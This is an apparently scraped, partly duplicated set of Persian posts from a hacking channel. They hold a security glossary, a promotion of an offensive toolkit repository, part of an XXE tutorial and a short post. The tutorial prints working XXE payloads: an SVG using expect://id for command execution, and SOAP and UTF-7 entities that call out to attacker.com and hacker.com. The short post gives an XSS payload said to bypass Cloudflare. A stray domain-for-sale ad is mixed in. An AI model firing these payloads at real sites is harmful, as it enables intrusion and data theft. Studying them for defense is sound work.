#حمله_روز_صفر (#Zero_Day_Attack(
صفر حمله به تهدیدات و آسیب پذیری هایی که می توانند از این موارد سوءاستفاده کنند اشاره دارد
قربانی قبل از توسعه دهنده شناسایی یا آدرس دهد و هر پچ را برای آن آزاد کند.
#آسیب_پذیری)#Vulnerabilit(
این آسیب پذیری به یک نقطه ضعف ، شکاف یا علت در هر سیستم یا
شبکه ای که مهاجمان برای عبور از آن می توانند مفید و مورد استفاده قرار گیرند.
هرگونه آسیب پذیری می تواند یک نقطه ورود برای رسیدن به هدف باشد.
#Daisy_Chaining
یک روند متوالی چندین هک یا حمله است,تلاش می کند دسترسی به شبکه یا سیستم ها را یکی پس از دیگری با استفاده از,همان اطلاعات و اطلاعات به دست آمده از تلاش قبلی.
#بهره_برداری)#Exploit(
بهره برداری نقض امنیت یک سیستم از طریق آسیب پذیری ها ، Zero-Day است
حملات یا هر روش دیگری برای هک کردن.
#داکسینگ)#Doxing(
اصطلاح مراجعه کنندگان Doxing به انتشار اطلاعات یا مجموعه ای از اطلاعات
در ارتباط با یک فرد این اطلاعات عمدتا به صورت عمومی جمع آوری می شود
از رسانه های اجتماعی یا منابع دیگر.
#ظرفیت_ترابری)#Payload(
ارجاع کننده بار به بخش واقعی اطلاعات یا داده ها در یک قاب مخالف ابرداده به صورت خودکار تولید شده است. در امنیت اطلاعات ،Payload بخشی یا بخشی از یک کد مخرب و سوءاستفاده است که باعث ایجاد آن می شود فعالیت ها و اقدامات بالقوه مضر مانند سوء استفاده ، باز کردن backdoors ،
و hijacking.
#bot
رباتها نرم افزاری هستند که برای کنترل هدف از راه دور و از آن استفاده می شود
انجام کارهای از پیش تعریف شده این قابلیت را دارد که اسکریپت های خودکار را روی آن اجرا کند
اینترنت ربات ها همچنین به عنوان Internet Bot یا Web Robot شناخته می شوند. اینها
رباتها می توانند برای اهداف اجتماعی مانند Chatterbots ، Commercial استفاده شوند
هدف یا هدف مخرب مانند Spambots ها ، ویروس ها ، و
حمله کرمها ، Botnets ، DDoS.
@TryHackBox
صفر حمله به تهدیدات و آسیب پذیری هایی که می توانند از این موارد سوءاستفاده کنند اشاره دارد
قربانی قبل از توسعه دهنده شناسایی یا آدرس دهد و هر پچ را برای آن آزاد کند.
#آسیب_پذیری)#Vulnerabilit(
این آسیب پذیری به یک نقطه ضعف ، شکاف یا علت در هر سیستم یا
شبکه ای که مهاجمان برای عبور از آن می توانند مفید و مورد استفاده قرار گیرند.
هرگونه آسیب پذیری می تواند یک نقطه ورود برای رسیدن به هدف باشد.
#Daisy_Chaining
یک روند متوالی چندین هک یا حمله است,تلاش می کند دسترسی به شبکه یا سیستم ها را یکی پس از دیگری با استفاده از,همان اطلاعات و اطلاعات به دست آمده از تلاش قبلی.
#بهره_برداری)#Exploit(
بهره برداری نقض امنیت یک سیستم از طریق آسیب پذیری ها ، Zero-Day است
حملات یا هر روش دیگری برای هک کردن.
#داکسینگ)#Doxing(
اصطلاح مراجعه کنندگان Doxing به انتشار اطلاعات یا مجموعه ای از اطلاعات
در ارتباط با یک فرد این اطلاعات عمدتا به صورت عمومی جمع آوری می شود
از رسانه های اجتماعی یا منابع دیگر.
#ظرفیت_ترابری)#Payload(
ارجاع کننده بار به بخش واقعی اطلاعات یا داده ها در یک قاب مخالف ابرداده به صورت خودکار تولید شده است. در امنیت اطلاعات ،Payload بخشی یا بخشی از یک کد مخرب و سوءاستفاده است که باعث ایجاد آن می شود فعالیت ها و اقدامات بالقوه مضر مانند سوء استفاده ، باز کردن backdoors ،
و hijacking.
#bot
رباتها نرم افزاری هستند که برای کنترل هدف از راه دور و از آن استفاده می شود
انجام کارهای از پیش تعریف شده این قابلیت را دارد که اسکریپت های خودکار را روی آن اجرا کند
اینترنت ربات ها همچنین به عنوان Internet Bot یا Web Robot شناخته می شوند. اینها
رباتها می توانند برای اهداف اجتماعی مانند Chatterbots ، Commercial استفاده شوند
هدف یا هدف مخرب مانند Spambots ها ، ویروس ها ، و
حمله کرمها ، Botnets ، DDoS.
@TryHackBox
❤2
⚙ همه در یک. ابزارهای هک
• Hackingtool
یک ابزار هک جامع است که شامل تمامی ابزارهای اصلی برای نفوذگران و هکرها می باشد.
• مخزن دارای 29.6 هزار ستاره است و دائماً به روز می شود. شامل ابزارهایی از دسته های زیر است:
- Anonymously Hiding Tools;
- Information gathering tools;
- Wordlist Generator;
- Wireless attack tools;
- SQL Injection Tools;
- Phishing attack tools;
- Web Attack tools;
- Post exploitation tools;
- Forensic tools;
- Payload creation tools;
- Exploit framework;
- Reverse engineering tools;
- DDOS Attack Tools;
- Remote Administrator Tools (RAT);
- XSS Attack Tools;
- Steganograhy tools;
- SocialMedia Bruteforce;
- Android Hacking tools;
- IDN Homograph Attack;
- Email Verify tools;
- Hash cracking tools;
- Wifi Deauthenticate;
- SocialMedia Finder;
- Payload Injector;
- Web crawling;
- Mix tools.
#Hack #tools
@TryHackBox
@TryHackBoxOfficial
• Hackingtool
یک ابزار هک جامع است که شامل تمامی ابزارهای اصلی برای نفوذگران و هکرها می باشد.
• مخزن دارای 29.6 هزار ستاره است و دائماً به روز می شود. شامل ابزارهایی از دسته های زیر است:
- Anonymously Hiding Tools;
- Information gathering tools;
- Wordlist Generator;
- Wireless attack tools;
- SQL Injection Tools;
- Phishing attack tools;
- Web Attack tools;
- Post exploitation tools;
- Forensic tools;
- Payload creation tools;
- Exploit framework;
- Reverse engineering tools;
- DDOS Attack Tools;
- Remote Administrator Tools (RAT);
- XSS Attack Tools;
- Steganograhy tools;
- SocialMedia Bruteforce;
- Android Hacking tools;
- IDN Homograph Attack;
- Email Verify tools;
- Hash cracking tools;
- Wifi Deauthenticate;
- SocialMedia Finder;
- Payload Injector;
- Web crawling;
- Mix tools.
➡️ https://github.com/Z4nzu/hackingtool
#Hack #tools
@TryHackBox
@TryHackBoxOfficial
👍3🔥1
📌 حملات XXE (تزریق XML) - بخش سوم
🔹 حملات پیشرفته XXE (ادامه)
4. استفاده از XXE در فایلهای SVG (حملات از طریق تصاویر)
فایلهای SVG مبتنی بر XML هستند و میتوانند حاوی payloadهای XXE باشند:
اگر سایتی آپلود SVG را بدون فیلتر کردن اجازه دهد، این payload میتواند دستورات سیستم را اجرا کند.
5. استفاده از XXE در پروتکل SOAP (سرویسهای وب)
در APIهای SOAP-based نیز میتوان از XXE سوءاستفاده کرد:
این payload درخواستی به سرور مهاجم ارسال میکند.
6. استفاده از کدگذاری UTF-7 برای دور زدن فیلترها
بعضی سیستمها فقط UTF-8 را پردازش میکنند، اما با UTF-7 میتوان برخی فیلترها را دور زد:
🔹 جمعبندی بخش سوم
- درون SVGها میتوانند حاوی XXE باشند.
-حتی APIهای SOAP نیز در معرض خطرند.
- با تغییر کدگذاری (مثل UTF-7) میتوان برخی فیلترها را دور زد.
ادامه در بخش چهارم (پیشگیری و دفاع)...
✍️نویسنده
@TryHackBox | The Chaos
#XXE #SVG #Payload #CyberSecurity
🔹 حملات پیشرفته XXE (ادامه)
4. استفاده از XXE در فایلهای SVG (حملات از طریق تصاویر)
فایلهای SVG مبتنی بر XML هستند و میتوانند حاوی payloadهای XXE باشند:
<svg xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink" width="300" height="200">
<image xlink:href="expect://id"></image>
</svg>
اگر سایتی آپلود SVG را بدون فیلتر کردن اجازه دهد، این payload میتواند دستورات سیستم را اجرا کند.
5. استفاده از XXE در پروتکل SOAP (سرویسهای وب)
در APIهای SOAP-based نیز میتوان از XXE سوءاستفاده کرد:
<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "https://attacker.com/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
این payload درخواستی به سرور مهاجم ارسال میکند.
6. استفاده از کدگذاری UTF-7 برای دور زدن فیلترها
بعضی سیستمها فقط UTF-8 را پردازش میکنند، اما با UTF-7 میتوان برخی فیلترها را دور زد:
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-https://hacker.com/+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
🔹 جمعبندی بخش سوم
- درون SVGها میتوانند حاوی XXE باشند.
-حتی APIهای SOAP نیز در معرض خطرند.
- با تغییر کدگذاری (مثل UTF-7) میتوان برخی فیلترها را دور زد.
ادامه در بخش چهارم (پیشگیری و دفاع)...
✍️نویسنده
@TryHackBox | The Chaos
#XXE #SVG #Payload #CyberSecurity
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
👍5❤2
XSS Bypass Cloudflare Payload:
لینکدین خودش را از کار انداخت…
@TryHackBox
#XSS #Bypass #payload
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
لینکدین خودش را از کار انداخت…
@TryHackBox
#XSS #Bypass #payload
1❤10🎃3👍1